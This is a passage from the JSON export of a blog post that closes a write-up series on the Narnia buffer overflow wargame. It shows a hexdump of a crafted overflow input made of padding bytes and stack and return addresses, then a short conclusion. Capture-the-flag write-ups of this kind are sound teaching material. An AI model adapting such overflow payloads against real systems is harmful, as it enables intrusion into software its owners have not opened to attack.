data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA\r\n00000010: 4141 4141 d82f ffff d8d4 ffff 1192 0408  AAAA.\/..........\r\n00000020: f6d6 ffff 20d0 fff7 1925 daf7 020a       .... 
....%....\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-80090ce elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"80090ce\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b69cf4f\" data-id=\"b69cf4f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7241593 elementor-widget elementor-widget-text-editor\" data-id=\"7241593\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>It is now up to you to find the right values!<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4c1878f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4c1878f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-13fd1f8\" data-id=\"13fd1f8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cb5b380 
elementor-widget elementor-widget-heading\" data-id=\"cb5b380\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1e39b2f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1e39b2f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c751902\" data-id=\"c751902\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f1a0b1e elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"f1a0b1e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>That wraps up the last article of the Narnia series!<\/p><p>I hope you enjoyed it and had as much fun as I did working through these challenges.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Here we are for the last challenge of the Narnia series. I really enjoyed doing these challenges; they taught me a lot about buffer overflows, how a stack works, assembly, and so on. 
I hope that is the case for you too! Discovery #include #include #include \/\/ gcc&#8217;s variable reordering fucked things up \/\/ to keep&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/09\/01\/narnia8\/\">Read more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,9],"class_list":["post-744","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-shellcode"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=744"}],"version-history":[{"count":62,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744\/revisions"}],"predecessor-version":[{"id":921,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744\/revisions\/921"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}